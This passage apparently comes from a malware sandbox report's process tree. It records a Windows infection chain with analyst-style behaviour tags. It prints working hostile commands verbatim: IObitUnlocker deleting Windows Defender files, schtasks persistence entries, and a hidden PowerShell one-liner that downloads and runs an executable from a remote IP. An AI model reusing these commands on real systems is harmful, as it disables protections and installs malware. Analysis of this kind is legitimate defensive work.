        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2900
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        10⤵
        
        PID:1768
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:3332
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:1936
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "212"
        10⤵
        
        PID:1832
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "212"
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe
        
        Unlocker /newDiskSize
        9⤵
        Sets service image path in registry
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc query IObitUnlocker
        10⤵
        
        PID:3168
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1804
        
        C:\Windows\system32\sc.exe
        
        sc query IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:3300
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker
        10⤵
        
        PID:2000
        
        C:\Windows\system32\sc.exe
        
        sc stop IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:4580
        
        C:\Windows\system32\sc.exe
        
        sc delete IObitUnlocker
        11⤵
        Launches sc.exe
        
        PID:4472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /f /pid "2356"
        10⤵
        
        PID:1840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /pid "2356"
        11⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1352
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start VMTools
        9⤵
        Launches sc.exe
        
        PID:2832
        
        C:\Windows\SysWOW64\sc.exe
        
        sc start VMTools
        9⤵
        Launches sc.exe
        
        PID:1496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn "95bEz20zM" /tr "C:\Temper\oxQ1wSE6.exe" /sc minute /mo 10 /ru "Admin" /f
        7⤵
        
        PID:4924
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "95bEz20zM" /tr "C:\Temper\oxQ1wSE6.exe" /sc minute /mo 10 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1576
    - - C:\Users\Admin\AppData\Local\Temp\10486700101\cbe5839bbf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486700101\cbe5839bbf.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3820
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn iS7oAmajZwM /tr "mshta C:\Users\Admin\Desktop\dhpDDIZKO.hta" /sc minute /mo 10 /ru "Admin" /f
        6⤵
        
        PID:5112
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn iS7oAmajZwM /tr "mshta C:\Users\Admin\Desktop\dhpDDIZKO.hta" /sc minute /mo 10 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4476
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\Desktop\dhpDDIZKO.hta
        6⤵
        Checks computer location settings
        
        PID:3168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:APPDATA+'U81CE1A9KTGDPTFLKNQCWXXIEL52REBS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1336
        
        C:\Users\Admin\AppData\RoamingU81CE1A9KTGDPTFLKNQCWXXIEL52REBS.EXE
        
        "C:\Users\Admin\AppData\RoamingU81CE1A9KTGDPTFLKNQCWXXIEL52REBS.EXE"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1660
    - - C:\Users\Admin\AppData\Local\Temp\10486710101\573ce1a5ed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486710101\573ce1a5ed.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2080
    - - C:\Users\Admin\AppData\Local\Temp\10486720101\rZBRvVk.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486720101\rZBRvVk.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:1448
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 685ad5269e3b0.vbs
        6⤵
        
        PID:4380
    - - C:\Users\Admin\AppData\Local\Temp\10486730101\EG11t89.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486730101\EG11t89.exe"
        5⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        
        PID:1368
      - C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0afeb9021a\nudwee.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        
        PID:544
    - - C:\Users\Admin\AppData\Local\Temp\10486740101\jzQILRF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486740101\jzQILRF.exe"
        5⤵
        
        PID:4516
    - - C:\Users\Admin\AppData\Local\Temp\10486750101\e6f0f77b36.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486750101\e6f0f77b36.exe"
        5⤵
        Checks BIOS information in registry
        Adds Run key to start application
        
        PID:4636
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3368
        
        C:\Windows\system32\cmd.exe
        
        cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\GoogleChrome.exe"
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:936
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 1
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:724
        
        C:\Users\Admin\AppData\Local\GoogleChrome.exe
        
        C:\Users\Admin\AppData\Local\GoogleChrome.exe
        8⤵
        Checks BIOS information in registry
        
        PID:3528
    - - C:\Users\Admin\AppData\Local\Temp\10486760101\v999f8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10486760101\v999f8.exe"
        5⤵
        Suspicious use of SetThreadContext
        
        PID:4508
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:724
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:1256
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff84b05dcf8,0x7ff84b05dd04,0x7ff84b05dd10
        8⤵
        
        PID:4788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2140 /prefetch:3
        8⤵
        
        PID:1592
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2040,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2032 /prefetch:2
        8⤵
        
        PID:2716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=2348 /prefetch:8
        8⤵
        
        PID:2568
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3140 /prefetch:1
        8⤵
        
        PID:2032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=3184 /prefetch:1
        8⤵
        
        PID:1696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4208,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4164 /prefetch:2
        8⤵
        
        PID:4648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4540,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=4484 /prefetch:1
        8⤵
        
        PID:1936
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5184,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5200 /prefetch:8
        8⤵
        
        PID:112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,754320826179796116,6866244204694833105,262144 --variations-seed-version=20250618-180047.684000 --mojo-platform-channel-handle=5432 /prefetch:8
        8⤵
        
        PID:5108
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
